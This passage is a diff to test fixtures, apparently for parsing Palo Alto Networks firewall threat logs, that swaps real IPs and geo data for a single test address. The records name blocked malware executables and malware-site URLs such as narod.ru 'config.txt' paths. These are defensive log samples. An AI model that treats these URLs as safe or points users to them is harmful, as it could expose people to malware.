"Zhejiang", + "region_name": "Jilin", "location": { - "lon": 120.1619, - "lat": 30.294 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 4134, + "number": 4837, "organization": { - "name": "No.31,Jin-rong Street" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "122.226.169.183" + "ip": "175.16.199.1" }, - "message": "122.226.169.183,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:54:38,41989,1,80,61726,0,0,0x200000,tcp,deny,\"52hxw.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,China,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:54:38,41989,1,80,61726,0,0,0x200000,tcp,deny,\"52hxw.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,China,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -8057,7 +8037,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:lIp7rPLlF21gCwZ63WafZ2HbNKA=", + "community_id": "1:vpiRKKCil4wbkrh++9kb1un4Ymo=", "transport": "tcp", "application": "web-browsing", "direction": "outbound" @@ -8092,15 +8072,15 @@ "crusher" ], "ip": [ - "122.226.169.183", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 4, - "ingested": "2021-09-08T12:37:05.545737028Z", - "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:54:33,122.226.169.183,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:54:38,41989,1,80,61726,0,0,0x200000,tcp,deny,\"52hxw.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,China,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079333400Z", + "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:54:33,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:54:38,41989,1,80,61726,0,0,0x200000,tcp,deny,\"52hxw.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,China,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -8123,26 +8103,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -8158,7 +8137,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 05:01:00,49238,1,63007,80,0,0,0x200000,tcp,block-url,\"softsellfast.com/test/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 05:01:00,49238,1,63007,80,0,0,0x200000,tcp,block-url,\"softsellfast.com/test/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -8199,7 +8178,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:n39Q6RPkLwPiDU/pfHT7uRZGkXY=", + "community_id": "1:6b7FIfvAunGzr85o0MLQFvp0BQM=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -8235,14 +8214,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545744237Z", - "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,url,1,2012/04/10 05:01:00,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 05:01:00,49238,1,63007,80,0,0,0x200000,tcp,block-url,\"softsellfast.com/test/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079339200Z", + "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,url,1,2012/04/10 05:01:00,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 05:01:00,49238,1,63007,80,0,0,0x200000,tcp,block-url,\"softsellfast.com/test/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -8279,25 +8258,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "Europe", - "country_name": "Netherlands", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Netherlands", + "region_name": "Jilin", "location": { - "lon": 4.8995, - "lat": 52.3824 - }, - "country_iso_code": "NL" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 43350, + "number": 4837, "organization": { - "name": "NForce Entertainment B.V." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "109.201.131.15" + "ip": "175.16.199.1" }, - "message": "109.201.131.15,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:45:23,21592,1,80,60212,0,0,0x200000,tcp,deny,\"setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Netherlands,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:45:23,21592,1,80,60212,0,0,0x200000,tcp,deny,\"setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Netherlands,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -8338,7 +8319,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:69YGwS9/vtp36Khj80nU/Q0TTfM=", + "community_id": "1:BQ/dUPZO8/mW0sp66fiTYAhPyE4=", "transport": "tcp", "application": "web-browsing", "direction": "outbound" @@ -8373,15 +8354,15 @@ "crusher" ], "ip": [ - "109.201.131.15", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 4, - "ingested": "2021-09-08T12:37:05.545751471Z", - "original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:45:17,109.201.131.15,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:45:23,21592,1,80,60212,0,0,0x200000,tcp,deny,\"setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Netherlands,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079345100Z", + "original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:45:17,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:45:23,21592,1,80,60212,0,0,0x200000,tcp,deny,\"setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Netherlands,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:12.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -8418,28 +8399,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "CA-QC", - "city_name": "Montreal", - "country_iso_code": "CA", - "country_name": "Canada", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "European Union", - "region_name": "Quebec", + "region_name": "Jilin", "location": { - "lon": -73.5848, - "lat": 45.4995 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 9009, + "number": 4837, "organization": { - "name": "M247 Ltd" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "91.209.163.202" + "ip": "175.16.199.1" }, - "message": "91.209.163.202,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:46:22,33760,1,80,60392,0,0,0x200000,tcp,deny,\"Live-Player_setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:46:22,33760,1,80,60392,0,0,0x200000,tcp,deny,\"Live-Player_setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -8480,7 +8460,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:MKMWzixtfYaSoShU7T3wN6MLk5g=", + "community_id": "1:/mjoSXhsxmOmj+1KojpmihUMtnQ=", "transport": "tcp", "application": "web-browsing", "direction": "outbound" @@ -8515,15 +8495,15 @@ "crusher" ], "ip": [ - "91.209.163.202", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 4, - "ingested": "2021-09-08T12:37:05.545758766Z", - "original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:46:16,91.209.163.202,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:46:22,33760,1,80,60392,0,0,0x200000,tcp,deny,\"Live-Player_setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079350900Z", + "original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:46:16,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:46:22,33760,1,80,60392,0,0,0x200000,tcp,deny,\"Live-Player_setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:12.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -8546,23 +8526,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "Europe", - "country_name": "Russia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Russian Federation", + "region_name": "Jilin", "location": { - "lon": 37.6068, - "lat": 55.7386 - }, - "country_iso_code": "RU" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 13238, + "number": 4837, "organization": { - "name": "YANDEX LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "213.180.199.61" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -8578,7 +8560,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,213.180.199.61,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:39,28723,1,59709,80,0,0,0x200000,tcp,block-url,\"boialex.narod.ru/config.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:39,28723,1,59709,80,0,0,0x200000,tcp,block-url,\"boialex.narod.ru/config.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "panw": { "panos": { "ruleset": "rule1", @@ -8619,7 +8601,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:J4hfLZVy8UJEkW68RkW2hMu84Wk=", + "community_id": "1:ZithDSqahEs9YBK9Uwr8ubWPM7w=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -8655,14 +8637,14 @@ ], "ip": [ "192.168.0.2", - "213.180.199.61", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545765987Z", - "original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:39,192.168.0.2,213.180.199.61,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:39,28723,1,59709,80,0,0,0x200000,tcp,block-url,\"boialex.narod.ru/config.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", + "ingested": "2021-12-09T13:42:59.079356600Z", + "original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:39,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:39,28723,1,59709,80,0,0,0x200000,tcp,block-url,\"boialex.narod.ru/config.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "created": "2013-03-25T23:59:12.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -8685,23 +8667,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "Europe", - "country_name": "Russia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Russian Federation", + "region_name": "Jilin", "location": { - "lon": 37.6068, - "lat": 55.7386 - }, - "country_iso_code": "RU" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 13238, + "number": 4837, "organization": { - "name": "YANDEX LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "213.180.199.61" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -8717,7 +8701,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,213.180.199.61,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:42,28932,1,59721,80,0,0,0x200000,tcp,block-url,\"edw-melon.narod.ru/config.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:42,28932,1,59721,80,0,0,0x200000,tcp,block-url,\"edw-melon.narod.ru/config.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "panw": { "panos": { "ruleset": "rule1", @@ -8758,7 +8742,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:1211QM61Juawz4PBXLQBL9Q2FNA=", + "community_id": "1:DHVwop+oDb6b+fXFJcQe+63vKqI=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -8794,14 +8778,14 @@ ], "ip": [ "192.168.0.2", - "213.180.199.61", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545773156Z", - "original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:42,192.168.0.2,213.180.199.61,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:42,28932,1,59721,80,0,0,0x200000,tcp,block-url,\"edw-melon.narod.ru/config.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", + "ingested": "2021-12-09T13:42:59.079362800Z", + "original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:42,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:42,28932,1,59721,80,0,0,0x200000,tcp,block-url,\"edw-melon.narod.ru/config.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "created": "2013-03-25T23:59:12.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -8824,23 +8808,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "Europe", - "country_name": "Russia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Russian Federation", + "region_name": "Jilin", "location": { - "lon": 37.6068, - "lat": 55.7386 - }, - "country_iso_code": "RU" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 13238, + "number": 4837, "organization": { - "name": "YANDEX LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "213.180.199.61" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -8856,7 +8842,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,213.180.199.61,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:51,28953,1,59752,80,0,0,0x200000,tcp,block-url,\"maximtushin.narod.ru/config.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:51,28953,1,59752,80,0,0,0x200000,tcp,block-url,\"maximtushin.narod.ru/config.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "panw": { "panos": { "ruleset": "rule1", @@ -8897,7 +8883,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:MQfJlERz16LAn6Hn1YhCNKLOjjA=", + "community_id": "1:aNSYU1I4qtaV4fuGe9HTFru7eDc=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -8933,14 +8919,14 @@ ], "ip": [ "192.168.0.2", - "213.180.199.61", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545780437Z", - "original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:51,192.168.0.2,213.180.199.61,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:51,28953,1,59752,80,0,0,0x200000,tcp,block-url,\"maximtushin.narod.ru/config.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", + "ingested": "2021-12-09T13:42:59.079368600Z", + "original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:51,28953,1,59752,80,0,0,0x200000,tcp,block-url,\"maximtushin.narod.ru/config.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "created": "2013-03-25T23:59:12.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -8977,28 +8963,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Brea", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "California", + "region_name": "Jilin", "location": { - "lon": -117.8854, - "lat": 33.9339 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 26347, + "number": 4837, "organization": { - "name": "New Dream Network, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "173.236.179.57" + "ip": "175.16.199.1" }, - "message": "173.236.179.57,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,\"uLLGRaXP.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,\"uLLGRaXP.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -9039,7 +9024,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:to6WA2KM9vqO74DfMPJ8+v0cKPs=", + "community_id": "1:dd+2RtCBMUfATx7W9zSc0ZBYnK0=", "transport": "tcp", "application": "web-browsing", "direction": "outbound" @@ -9074,15 +9059,15 @@ "crusher" ], "ip": [ - "173.236.179.57", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 4, - "ingested": "2021-09-08T12:37:05.545787385Z", - "original": "Mar 25 23:59:17 1,2013/03/25 23:59:17,01606001116,THREAT,file,1,2012/04/10 04:19:59,173.236.179.57,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,\"uLLGRaXP.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079374300Z", + "original": "Mar 25 23:59:17 1,2013/03/25 23:59:17,01606001116,THREAT,file,1,2012/04/10 04:19:59,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,\"uLLGRaXP.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:17.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -9105,26 +9090,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -9140,7 +9124,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:09:01,55402,1,63183,80,0,0,0x200000,tcp,block-url,\"marketingsoluchion.biz/fkn/config.bin\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:09:01,55402,1,63183,80,0,0,0x200000,tcp,block-url,\"marketingsoluchion.biz/fkn/config.bin\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -9181,7 +9165,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:uO6RhHsqSUg1LHv5h+n+FE4cqrE=", + "community_id": "1:2rgAHkgQA6DrgtjSmjlvvertGQQ=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -9217,14 +9201,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545794428Z", - "original": "Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,THREAT,url,1,2012/04/10 04:09:01,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:09:01,55402,1,63183,80,0,0,0x200000,tcp,block-url,\"marketingsoluchion.biz/fkn/config.bin\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079396400Z", + "original": "Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,THREAT,url,1,2012/04/10 04:09:01,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:09:01,55402,1,63183,80,0,0,0x200000,tcp,block-url,\"marketingsoluchion.biz/fkn/config.bin\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:59:22.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -9248,25 +9232,24 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "HK-HCW", - "city_name": "Central", - "country_iso_code": "HK", - "country_name": "Hong Kong", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Central and Western District", + "region_name": "Jilin", "location": { - "lon": 114.15, - "lat": 22.2909 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 8075, + "number": 4837, "organization": { - "name": "Microsoft Corporation" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "207.46.140.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -9282,7 +9265,7 @@ }, "ip": "192.168.0.6" }, - "message": "192.168.0.6,207.46.140.46,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:32,25217,1,1047,80,0,0,0x200000,tcp,alert,\"default.aspx\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.6,175.16.199.1,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:32,25217,1,1047,80,0,0,0x200000,tcp,alert,\"default.aspx\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -9323,7 +9306,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:KC3xpBK9CdouZqamG9S6Mjl6LIo=", + "community_id": "1:6aQBn5QchBNL0ZBo/IVt9BBsYB0=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -9359,14 +9342,14 @@ ], "ip": [ "192.168.0.6", - "207.46.140.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545801479Z", - "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:27,192.168.0.6,207.46.140.46,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 